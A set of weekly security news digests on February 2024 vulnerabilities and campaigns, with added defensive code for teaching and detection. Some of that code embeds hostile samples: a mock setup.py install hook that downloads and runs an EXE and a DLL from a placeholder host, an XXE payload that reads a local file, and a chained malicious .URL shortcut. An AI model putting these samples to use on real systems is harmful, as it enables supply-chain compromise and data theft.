Programmer’s Digest #71

02/14/2024-02/21/2024 VMware Alert, New Malicious PyPI Packages, Critical Flaws in ConnectWise ScreenConnect Software And More.

1. VMware Alert: Uninstall EAP Now – Critical Flaw Puts Active Directory at Risk

VMware is advising users to uninstall the deprecated Enhanced Authentication Plugin (EAP) because of a critical flaw (CVE-2024-22245, CVSS score: 9.6) described as an arbitrary authentication relay bug: a malicious actor could trick a target domain user with EAP installed in their web browser into requesting and relaying service tickets for arbitrary Active Directory Service Principal Names (SPNs). A second EAP flaw, a session hijack (CVE-2024-22250, CVSS score: 7.8), allows an unprivileged local actor on the same Windows system to seize a privileged EAP session. Only users who installed EAP on Windows to log in to VMware vSphere through the vSphere Client are affected. VMware will not patch either flaw; the recommended fix is complete removal of the plugin. Separately, SonarSource disclosed a cross-site scripting (XSS) flaw in Joomla! (CVE-2024-21726) caused by inadequate content filtering in the filter code; it is addressed in versions 5.0.3 and 4.4.3 and rated moderate.

2. New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics

Cybersecurity researchers found two malicious packages on PyPI that use DLL side-loading to evade detection and execute harmful code. Named NP6HelperHttptest and NP6HelperHttper, they were downloaded 537 and 166 times before removal. The NP6 prefix refers to a legitimate ChapsVision marketing solution; the fake packages mimic the legitimate tools NP6HelperHttp and NP6HelperConfig in order to trick developers into installing rogue versions, a reminder that typosquatting of vendor-specific package names remains a live supply chain threat. Each package carries a setup.py script that runs at install time and downloads two files: a legitimate, signed executable that is susceptible to DLL side-loading ("ComServer.exe") and a malicious DLL with the name that executable expects to load ("dgdeskband64.dll"). Because the payload runs inside a trusted, signed process, it is less likely to be flagged; the same trick was used by the npm package "aabquerys", which side-loaded a DLL to deploy a remote access trojan. The DLL communicates with an attacker-controlled domain to fetch further malicious code, suggesting these packages are part of a broader campaign against open-source repositories.
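The install-time behaviour described above (a setup.py that downloads an executable and a DLL and launches them) is something a practitioner can screen for before a package ever reaches a developer machine. The following is an added example, not code from ReversingLabs, PyPI or the packages themselves: a static AST check over a setup.py that flags network fetches, process execution, DLL loading and custom install hooks. Both setup.py texts are constructed for the demo, and example.invalid is a placeholder domain.

```python
"""Static screen for install-time behaviour in a setup.py (added example)."""
import ast

# Fully qualified calls that have no business running at pip install time
SUSPICIOUS_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get", "requests.post",
    "subprocess.Popen", "subprocess.run", "subprocess.call", "subprocess.check_output",
    "os.system", "os.startfile", "ctypes.CDLL", "ctypes.WinDLL",
}
# Bare names that are suspicious even after "from x import y" (deliberately
# excludes ambiguous names such as run/get/call to limit false positives)
SUSPICIOUS_NAMES = {"urlopen", "urlretrieve", "Popen", "check_output", "system", "startfile", "CDLL", "WinDLL"}
SUSPICIOUS_SUBSTRINGS = (".exe", ".dll", "http://", "https://")
# setuptools command classes that, when subclassed in cmdclass=, run during installation
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}


def _dotted(node):
    """Return 'a.b.c' for an attribute chain, or None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def scan_setup_py(source: str) -> list:
    """Return sorted (line, finding) tuples for suspicious constructs in setup.py source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name and (name in SUSPICIOUS_CALLS or name.rsplit(".", 1)[-1] in SUSPICIOUS_NAMES):
                findings.add((node.lineno, f"call:{name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for marker in SUSPICIOUS_SUBSTRINGS:
                if marker in node.value.lower():
                    findings.add((node.lineno, f"string:{marker}"))
        elif isinstance(node, ast.ClassDef):
            bases = {_dotted(b) for b in node.bases}
            if {b.rsplit(".", 1)[-1] for b in bases if b} & INSTALL_HOOK_BASES:
                findings.add((node.lineno, f"install_hook:{node.name}"))
    return sorted(findings)


# Constructed sample modelled on the behaviour described in the article (not the real package)
MALICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import os, subprocess, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        target = os.path.join(os.environ["TEMP"], "svc")
        urllib.request.urlretrieve("https://example.invalid/ComServer.exe", os.path.join(target, "ComServer.exe"))
        urllib.request.urlretrieve("https://example.invalid/dgdeskband64.dll", os.path.join(target, "dgdeskband64.dll"))
        subprocess.Popen([os.path.join(target, "ComServer.exe")])

setup(name="NP6HelperHttptest", version="1.0", cmdclass={"install": PostInstall})
'''

# Constructed benign setup.py for comparison
BENIGN_SETUP = '''
from setuptools import setup
setup(name="NP6HelperHttp", version="1.0", packages=["np6helperhttp"])
'''

if __name__ == "__main__":
    for line, finding in scan_setup_py(MALICIOUS_SETUP):
        print(f"setup.py:{line}: {finding}")
    print("benign findings:", scan_setup_py(BENIGN_SETUP))
```

Run it against a downloaded sdist (`pip download --no-binary :all: --no-deps <pkg>` and unpack) before installing; a hit on install_hook plus any call finding is the combination seen here, since a cmdclass override is what makes the download run at pip install time rather than at import.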

3. Critical Flaws Found in ConnectWise ScreenConnect Software – Patch Now

ConnectWise has released updates for its ScreenConnect remote desktop software to fix two security flaws, one of them critical and leading to remote code execution. At the time of the advisory neither had a CVE identifier; they are an authentication bypass (CVSS: 10.0), later tracked as CVE-2024-1709, and a path traversal (CVSS: 8.4), later tracked as CVE-2024-1708. Both affect ScreenConnect 23.9.7 and earlier and were reported through ConnectWise's vulnerability disclosure channel on February 13, 2024; the fix is version 23.9.8. Cloud-hosted instances are updated by ConnectWise, so the advisory is aimed at self-hosted (on-premises) installations. Although there was no evidence of exploitation when the advisory went out, ConnectWise recommends moving to 23.9.8 and will also ship updated builds for versions 22.4 through 23.9.7. Huntress found over 8,800 exposed servers running vulnerable versions and built a working exploit for the authentication bypass, which it describes as trivial, so on-premises users should treat this as an emergency patch.

4. WordPress Bricks Theme Under Active Attack: Critical Flaw Impacts 25,000+ Sites

The Bricks WordPress theme has a critical flaw (CVE-2024-25600, CVSS: 9.8) that lets unauthenticated attackers execute arbitrary PHP code on the server. All versions up to 1.9.6 are vulnerable; the fix shipped in 1.9.6.1 on February 13, 2024. Reported by Snicco on February 10, the bug sits in the prepare_query_vars_from_settings() function, which passes user-controlled input to eval(); the only gate was a nonce check, and because that nonce is exposed to unauthenticated visitors on the site's front end it provides no real authorization. Exploitation attempts began on February 14, with Wordfence recording over three dozen. Around 25,000 active installations are exposed, so site owners should update without delay.

5. Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries

A firmware analysis of Ivanti Pulse Secure appliances by Eclypsium has highlighted how hard it is to secure a software supply chain when the base operating system is abandoned. The firmware is built on CentOS 6.4, which has been out of support since 2020, and carries Linux components more than a decade old. The appliances are already under active attack: CVE-2023-46805, CVE-2024-21887 and CVE-2024-21893 are being exploited against Ivanti Connect Secure, Policy Secure and ZTA gateways to deploy a range of malware, and Akamai reports heightened scanning for CVE-2024-22024. Eclypsium used CVE-2024-21893 to gain a shell on an appliance and inventory its packages, finding Perl still at version 5.6.1 from 2001 and the Linux kernel at 2.6.32, alongside other outdated, vulnerable libraries. It also found that Ivanti's Integrity Checker Tool (ICT) excludes several directories from its scan, which gives an attacker places to stage files without tripping the check. Eclypsium argues that vendors need transparent, independently verifiable validation of appliance firmware, especially while exploitation attempts keep rising.

Tags: 2024, digest, programmers'

Programmer’s Digest #70

02/07/2024-02/14/2024 Ivanti Vulnerability, CISA and OpenSSF Release Framework, New Ivanti Auth Bypass Flaw And More.

1. Ivanti Vulnerability Exploited to Install ‘DSLog’ Backdoor on 670+ IT Infrastructures

Threat actors are exploiting a recent security flaw in Ivanti Connect Secure, Policy Secure and ZTA gateways to deploy a backdoor named DSLog. Orange Cyberdefense observed exploitation of CVE-2024-21893 shortly after proof-of-concept code was released. The vulnerability, disclosed alongside CVE-2024-21888, is a server-side request forgery (SSRF) in the SAML component that grants access to restricted resources without authentication. Ivanti confirmed limited targeted attacks, but the true scale is uncertain; the Shadowserver Foundation reported exploitation attempts from over 170 IP addresses. Compromises date back to at least February 3, with attackers injecting the DSLog code into a Perl file on the appliance for persistent remote access. Each backdoored appliance is assigned its own hash, which acts as an API key: the attacker presents it in an HTTP request to execute commands, and because the value differs per device it cannot be used as a simple network indicator. The attackers also erase ".access" logs to evade detection. By querying for artifacts the SSRF exploitation leaves behind, Orange Cyberdefense initially identified 670 compromised assets, a figure that dropped to 524 by February 7.

2. CISA and OpenSSF Release Framework for Package Repository Security

CISA, in collaboration with the Open Source Security Foundation (OpenSSF), has released a framework named Principles for Package Repository Security. Developed by OpenSSF's Securing Software Repositories Working Group, it aims to harden package repositories and so raise the security of the open-source ecosystems that depend on them. It defines four security maturity levels (Level 0 through Level 3) across four areas: authentication, authorization, general capabilities, and command-line interface (CLI) tooling. Level 1 covers basic measures such as offering multi-factor authentication (MFA); the higher levels add requirements such as mandatory MFA for all maintainers and support for package build provenance. The framework's position is that every package management ecosystem should reach at least Level 1. Its purpose is to let repository operators assess their current maturity and plan improvements over time as threats evolve.

3. Warning: New Ivanti Auth Bypass Flaw Affects Connect Secure and ZTA Gateways

Ivanti is warning of a high-severity flaw (CVE-2024-22024, CVSS: 8.3) affecting Connect Secure, Policy Secure and ZTA gateway devices that allows an attacker to bypass authentication. The bug is an XML external entity (XXE) issue in the SAML component. Affected versions are Connect Secure 9.x and 22.x, Policy Secure 9.x and 22.x, and ZTA 22.x; patches are available for each. There is no evidence of active exploitation so far, but given how quickly the previous Ivanti flaws were abused, users are urged to apply the patches promptly. The flaw was reported to Ivanti by cybersecurity firm watchTowr, which notes that an XXE in this position can yield denial of service (DoS), local file read, or server-side request forgery (SSRF), depending on which protocols the underlying XML library allows.

4. Critical Patches Released for New Flaws in Cisco, Fortinet, VMware Products

Cisco, Fortinet, and VMware have issued security patches for a range of vulnerabilities, including critical ones that allow arbitrary actions on affected devices. Cisco disclosed three cross-site request forgery (CSRF) flaws (CVE-2024-20252, CVE-2024-20254, CVE-2024-20255) in the Expressway Series; a successful attack could perform actions as the victim, including modifying the system configuration. Fortinet addressed two new vulnerabilities (CVE-2024-23108, CVE-2024-23109) that bypass the fix for an earlier critical FortiSIEM supervisor flaw (CVE-2023-34992) and allow unauthenticated remote code execution. VMware reported five moderate-to-important flaws in Aria Operations for Networks, including local privilege escalation and cross-site scripting. Upgrading to the versions specified in each advisory mitigates the risk on all three platforms.

5. DarkMe Malware Targets Traders Using Microsoft SmartScreen Zero-Day Vulnerability

A zero-day vulnerability in Microsoft Defender SmartScreen has been exploited by an advanced persistent threat group known as Water Hydra (aka DarkCasino) to target financial traders. Trend Micro discovered the campaign in December 2023; it abuses CVE-2024-21412, a security feature bypass involving Internet Shortcut files (.URL), to slip past SmartScreen and deliver the DarkMe malware. Microsoft patched the flaw in February. The attack still requires the victim to click a booby-trapped link that leads to a malicious installer. The chain abuses the search: application protocol and layered Internet Shortcut files, where one .URL file points at another .URL file hosted on a remote share, so that the final payload is launched without the SmartScreen warning that a directly downloaded file would trigger. The end goal is to deploy DarkMe, a Visual Basic trojan that gives the attackers remote control and data exfiltration. Water Hydra's ability to discover and exploit a zero-day shows how far some cybercrime groups have advanced, and points to a convergence between cybercrime and nation-state tradecraft.
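The layered shortcut chain described above can be spotted by parsing the .URL files themselves. The following is an added example, not Trend Micro's analysis tooling or the attackers' code: it reads Internet Shortcut files (INI-style, with an [InternetShortcut] section), flags a target that is a remote file, another shortcut, an executable or a search: URL, and follows a shortcut-to-shortcut chain through an in-memory stand-in for the remote share. The sample files and the 203.0.113.5 host (an RFC 5737 documentation address) are constructed.

```python
"""Parse Internet Shortcut (.URL) files and follow shortcut chains (added example)."""
import configparser
import posixpath
from urllib.parse import urlsplit

SHORTCUT_EXTS = (".url", ".lnk")
EXEC_EXTS = (".exe", ".cmd", ".bat", ".scr", ".js", ".vbs", ".hta", ".msi")
SEARCH_SCHEMES = ("search", "search-ms")


def parse_url_file(text: str) -> dict:
    """Return the URL= and IconFile= values of the [InternetShortcut] section."""
    # Only '=' is a delimiter: values such as 'search:query=...' contain ':'
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    section = cp["InternetShortcut"]
    return {"url": section.get("URL", "").strip(), "iconfile": section.get("IconFile", "").strip()}


def analyze_shortcut(text: str) -> dict:
    """Parse one .URL file and attach a list of findings."""
    info = parse_url_file(text)
    parts = urlsplit(info["url"].replace("\\", "/"))  # normalise Windows separators
    scheme, path = parts.scheme.lower(), parts.path.lower()
    findings = []
    if scheme in SEARCH_SCHEMES:
        findings.append("search_protocol")
    # file://host/share/... or file:////host/share/... (UNC), or a web/SMB URL
    if scheme in ("http", "https", "smb") or (scheme == "file" and (parts.netloc or path.startswith("//"))):
        findings.append("remote_target")
    if path.endswith(SHORTCUT_EXTS):
        findings.append("nested_shortcut")
    if path.endswith(EXEC_EXTS):
        findings.append("executable_target")
    icon = info["iconfile"].replace("\\", "/")
    if icon.startswith("//") or "://" in icon:
        findings.append("remote_icon")  # icon fetched from a remote host on render
    info["findings"] = findings
    return info


def follow_chain(name: str, share: dict, max_hops: int = 5) -> list:
    """Walk shortcut -> shortcut -> payload; `share` maps file names to file contents."""
    hops = []
    while name in share and len(hops) < max_hops:
        hop = analyze_shortcut(share[name])
        hop["file"] = name
        hops.append(hop)
        if "nested_shortcut" not in hop["findings"]:
            break
        name = posixpath.basename(urlsplit(hop["url"].replace("\\", "/")).path)
    return hops


# Constructed stand-in for the attacker's share: the lure points at a second
# shortcut, which points at the actual payload.
SHARE = {
    "invoice.url": """[InternetShortcut]
URL=file://203.0.113.5/share/invoice_2024.url
IconIndex=3
""",
    "invoice_2024.url": r"""[InternetShortcut]
URL=file://203.0.113.5/share/invoice_2024.pdf.cmd
IconFile=\\203.0.113.5\share\pdf.ico
""",
}
# Constructed shortcut using the search: protocol to open the share in Explorer
LANDING_SHORTCUT = r"""[InternetShortcut]
URL=search:query=invoice&crumb=location:\\203.0.113.5\share
"""

if __name__ == "__main__":
    for hop in follow_chain("invoice.url", SHARE):
        print(hop["file"], "->", hop["url"], hop["findings"])
    print("landing:", analyze_shortcut(LANDING_SHORTCUT)["findings"])
```

In a mail gateway or EDR rule the useful signal is the combination: a .URL whose target is remote and is itself a shortcut or an executable should never arrive from outside, regardless of whether the individual file carries a Mark-of-the-Web.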

6. Microsoft Rolls Out Patches for 73 Flaws, Including 2 Windows Zero-Days

Microsoft's February Patch Tuesday addresses 73 security flaws, including two zero-days that were already being exploited. CVE-2024-21351 allows code injection into SmartScreen, and CVE-2024-21412 bypasses SmartScreen's security checks on Internet Shortcut files; the latter is the flaw Water Hydra used in its attack chain against financial traders. Both require convincing a user to open a malicious file. The update also covers five critical flaws, including remote code execution vulnerabilities in Microsoft Exchange Server and Outlook. Also patched is CVE-2023-50387, dubbed KeyTrap, a design flaw in DNSSEC validation dating back some 24 years that lets a single crafted response exhaust a resolver's CPU and cause a denial of service. Users are urged to apply the patches promptly.


Programmer’s Digest #69

01/31/2024-02/07/2024 Critical JetBrains Security Flaw, New Flaws in Azure, Cloudflare Breach And More.

1. Critical JetBrains TeamCity On-Premises Flaw Exposes Servers to Takeover – Patch Now

JetBrains is warning of a critical security flaw (CVE-2024-23917, CVSS: 9.8) in its TeamCity On-Premises software that could let an attacker take control of a vulnerable instance. An unauthenticated attacker with HTTP(S) access to the server can bypass authentication and gain administrative control. Versions 2017.1 through 2023.11.2 are affected; the fix is 2023.11.3. The flaw was reported by an external researcher on January 19, 2024. Customers who cannot upgrade can apply a security patch plugin, and JetBrains advises that any server that cannot be fixed immediately be made inaccessible from the public internet in the meantime. No exploitation is known so far, but a similar TeamCity flaw (CVE-2023-42793) was actively exploited by ransomware gangs and state-sponsored groups after its disclosure last year.

2. Experts Detail New Flaws in Azure HDInsight Spark, Kafka, and Hadoop Services

Three security vulnerabilities in Azure HDInsight’s Apache Hadoop, Kafka, and Spark services allow privilege escalation and a regular expression denial-of-service (ReDoS).

Orca Security researcher Lidor Ben Shitrit reported the flaws, which are:

  • CVE-2023-36419 (CVSS: 8.8) – Apache Oozie XXE Injection Elevation of Privilege;
  • CVE-2023-38156 (CVSS: 7.2) – Apache Ambari JDBC Injection Elevation of Privilege;
  • Apache Oozie ReDoS Vulnerability.

The two privilege escalation flaws can be triggered with crafted network requests and yield cluster administrator privileges. The XXE flaw lets an attacker read files as root and escalate privileges, while the JDBC injection flaw can be used to obtain a reverse shell as root. The ReDoS arises from inadequate input validation: a crafted input drives the regular expression engine into an intensive matching loop, denying service. Microsoft released fixes on October 26, 2023, following responsible disclosure. Left unpatched, these flaws could disrupt cluster operations, degrade performance, and affect service availability and reliability.
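Both the Ivanti SAML flaw covered in Digest #70 (CVE-2024-22024) and the Apache Oozie flaw here (CVE-2023-36419) are XML external entity (XXE) bugs: a parser that resolves external entities lets a DOCTYPE in attacker-supplied XML pull a local file into the document. The following is an added example, not Ivanti's or Oozie's code, showing the pattern on a constructed SAML-style <Response> with Python's standard-library parsers: a vulnerable parse that enables external general entities and leaks a local file into the NameID, beside a hardened parse that rejects any DTD before parsing. The "secret" file is created by the demo in a temporary directory, and alice@example.com is a placeholder.

```python
"""XXE on a SAML-style message: vulnerable parser beside a hardened one (added example)."""
import io
import os
import re
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
import xml.sax.handler

# Constructed benign message (what a SAML consumer expects to see)
BENIGN_RESPONSE = b"""<?xml version="1.0"?>
<Response><Assertion><Subject><NameID>alice@example.com</NameID></Subject></Assertion></Response>"""


def build_xxe_response(local_path: str) -> bytes:
    """Attacker-controlled message: the NameID is an external entity pointing at a server-local file."""
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE Response [<!ENTITY xxe SYSTEM "' + local_path.encode() + b'">]>\n'
        b'<Response><Assertion><Subject><NameID>&xxe;</NameID></Subject></Assertion></Response>'
    )


class _NameIDCollector(xml.sax.handler.ContentHandler):
    """Collects the character data of the first <NameID> element."""
    def __init__(self):
        super().__init__()
        self.inside = False
        self.name_id = ""

    def startElement(self, name, attrs):
        if name == "NameID":
            self.inside = True

    def endElement(self, name):
        if name == "NameID":
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.name_id += content


def parse_nameid_vulnerable(data: bytes) -> str:
    """Resolves external general entities, so a DOCTYPE in the message can read files."""
    parser = xml.sax.make_parser()
    # The mistake: external entity resolution is off by default since Python 3.7.1;
    # turning it on (or using an XML library where it is on by default) reintroduces XXE.
    parser.setFeature(xml.sax.handler.feature_external_ges, True)
    collector = _NameIDCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return collector.name_id.strip()


_DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_nameid_hardened(data: bytes) -> str:
    """Rejects any DTD up front; SAML messages never legitimately carry one."""
    if _DTD_MARKER.search(data):
        raise ValueError("DOCTYPE/ENTITY declaration rejected")
    root = ET.fromstring(data)  # ElementTree does not resolve external entities either
    node = root.find(".//NameID")
    if node is None or not node.text:
        raise ValueError("missing NameID")
    return node.text.strip()


def run_demo() -> dict:
    """Create a local 'secret', feed an XXE payload to both parsers, report what each did."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as fh:
            fh.write("db-password=hunter2")  # constructed secret
        payload = build_xxe_response(secret)
        leaked = parse_nameid_vulnerable(payload)
        try:
            parse_nameid_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True
    return {"leaked": leaked, "blocked": blocked, "benign": parse_nameid_hardened(BENIGN_RESPONSE)}


if __name__ == "__main__":
    print(run_demo())
```

The same DOCTYPE with a SYSTEM identifier of http://... instead of a path turns the file read into the SSRF that watchTowr lists for the Ivanti flaw, which is why the hardened version rejects the declaration outright rather than trying to enumerate safe protocols.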

3. Recent SSRF Flaw in Ivanti VPN Products Undergoes Mass Exploitation

Ivanti Connect Secure and Policy Secure are seeing mass exploitation of a recently disclosed SSRF vulnerability (CVE-2024-21893, CVSS: 8.2) that gives unauthenticated access to restricted resources. The Shadowserver Foundation observed over 170 IP addresses attempting to exploit it to establish a reverse shell. The flaw, which also affects Neurons for ZTA, lets attackers bypass authentication, and exploitation surged once Rapid7 published a proof-of-concept (PoC). Chained with the previously patched command injection flaw (CVE-2024-21887), it yields unauthenticated remote code execution. Notably, CVE-2024-21893 is the same bug as CVE-2023-36661 in the Shibboleth XMLTooling library, which was fixed upstream in June 2023; it is one of several outdated open-source components bundled in the Ivanti VPN appliances. Ivanti has released a second round of mitigations and begun shipping official patches. Mandiant reports that threat actors are exploiting CVE-2023-46805 and CVE-2024-21887 to deploy custom web shells tracked as BUSHWALK, CHAINLINE, FRAMESTING and LIGHTWIRE.

4. Cloudflare Breach: Nation-State Hackers Access Source Code and Internal Docs

Cloudflare has disclosed a likely nation-state intrusion in which an attacker gained unauthorized access to its internal Atlassian server between November 14 and 24, 2023, exposing documents and source code. The actor's aim appeared to be persistent, widespread access to Cloudflare's network. In response, Cloudflare rotated over 5,000 production credentials, physically segmented test and staging systems, and forensically triaged 4,893 systems. After a four-day reconnaissance period in which the attacker browsed Cloudflare's Confluence wiki and Jira bug tracker, they established persistent access, ultimately viewing 120 code repositories and exfiltrating 76 of them. The repositories concerned backups, network configuration, identity management, remote access, and infrastructure management tooling. An attempt to access a console server at a not-yet-live data center in São Paulo failed. The intrusion was made possible by credentials stolen in the October 2023 compromise of Okta's support system, including an AWS credential and Atlassian service tokens, which Cloudflare had failed to rotate at the time. Cloudflare terminated the attacker's connections on November 24, 2023, and engaged CrowdStrike for an independent assessment.

5. FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network

The FritzFrog botnet has reemerged with a new variant that uses the Log4Shell vulnerability to spread within networks it has already compromised. Akamai reports that rather than only hitting internet-facing targets, the malware sprays the Log4Shell exploit at every Java application it can reach on the internal network, betting that hosts behind the perimeter were never patched. Originally reliant on weak SSH credentials, FritzFrog now targets healthcare, education and government sectors and deploys cryptocurrency miners. The turn toward internal hosts is the notable change: neglected internal machines are far more likely to still be vulnerable, so a single foothold can fan out quickly. The variant also refines its SSH brute-force logic and uses CVE-2021-4034 (PwnKit) for local privilege escalation. To evade detection it avoids writing files to disk, using /dev/shm and memfd_create to keep payloads memory-resident, a technique seen in other Linux malware.

6. Exposed Docker APIs Under Attack in ‘Commando Cat’ Cryptojacking Campaign

Exposed Docker API endpoints are being targeted by a cryptojacking campaign named Commando Cat, the second such campaign seen within a few months. Active since the start of 2024, it uses the open-source Commando project to generate a harmless-looking container, then escapes to the underlying host and deploys payloads that include backdoors and miners, among them XMRig and the 9Hits Viewer. Before proceeding it checks which of a known set of services are already present on the host. Payloads fetched from the command-and-control server with curl or wget add SSH keys, create rogue users and exfiltrate credentials; scripts are executed from /dev/shm so that little touches disk, which complicates forensics. The chain ends with a Base64-encoded script that kills competing miners and installs XMRig.
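Both FritzFrog (memfd_create) and Commando Cat (/dev/shm) rely on executing code that never lands on a regular filesystem, and on Linux that leaves a visible trace in /proc: the exe link and the executable mappings of such a process point at a memfd or a tmpfs path. The following is an added example, not Akamai's or Cado's detection logic: it classifies a process from its /proc/<pid>/exe target and its /proc/<pid>/maps lines, and scans the live /proc when run (root is needed to see other users' processes). The sample /proc data is constructed to match the kernel's formats.

```python
"""Flag memfd- and /dev/shm-backed processes from /proc data (added example)."""
import os


def classify_process(exe_target: str, maps_lines: list) -> list:
    """exe_target: os.readlink('/proc/<pid>/exe'); maps_lines: lines of /proc/<pid>/maps."""
    flags = set()
    # The kernel reports a memfd-backed executable as '/memfd:<name> (deleted)'
    if exe_target.startswith("/memfd:"):
        flags.add("memfd_exe")
    if exe_target.startswith("/dev/shm/"):
        flags.add("dev_shm_exe")
    if exe_target.endswith("(deleted)"):
        flags.add("deleted_exe")  # binary unlinked after exec: hides from file scanners
    for line in maps_lines:
        # address perms offset dev inode [path]; maxsplit keeps paths containing spaces intact
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # anonymous mapping, no backing path
        perms, path = fields[1], fields[5]
        if "x" not in perms:
            continue
        if path.startswith("/memfd:"):
            flags.add("memfd_exec_map")
        elif path.startswith("/dev/shm/"):
            flags.add("dev_shm_exec_map")
    return sorted(flags)


def scan_proc(proc_root: str = "/proc") -> dict:
    """Return {pid: flags} for every process on the host that trips a rule."""
    suspicious = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
            with open(os.path.join(proc_root, entry, "maps")) as fh:
                maps = fh.read().splitlines()
        except OSError:
            continue  # process exited, or not ours and we are not root
        flags = classify_process(exe, maps)
        if flags:
            suspicious[int(entry)] = flags
    return suspicious


# Constructed /proc samples in the kernel's readlink and maps formats
SAMPLES = {
    "fritzfrog_like": ("/memfd:kworker (deleted)", [
        "55e1c0a00000-55e1c0c00000 r-xp 00000000 00:01 12345      /memfd:kworker (deleted)",
        "7f3a10000000-7f3a10021000 rw-p 00000000 00:00 0",
    ]),
    "commando_cat_like": ("/dev/shm/.x/xmrig", [
        "5603f0000000-5603f0400000 r-xp 00000000 00:14 98765      /dev/shm/.x/xmrig",
        "7f0b20000000-7f0b201c5000 r-xp 00000000 08:01 1312       /usr/lib/x86_64-linux-gnu/libc.so.6",
    ]),
    "benign_sshd": ("/usr/sbin/sshd", [
        "5603f0000000-5603f0400000 r-xp 00000000 08:01 2222       /usr/sbin/sshd",
    ]),
}

if __name__ == "__main__":
    for label, (exe, maps) in SAMPLES.items():
        print(f"{label}: {classify_process(exe, maps)}")
    print("live host:", scan_proc())
```

Some legitimate software (JIT runtimes, a few package managers) does use memfd for executable memory, so treat a hit as a triage lead and pair it with the process's parent, user and network connections rather than alerting on the flag alone.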
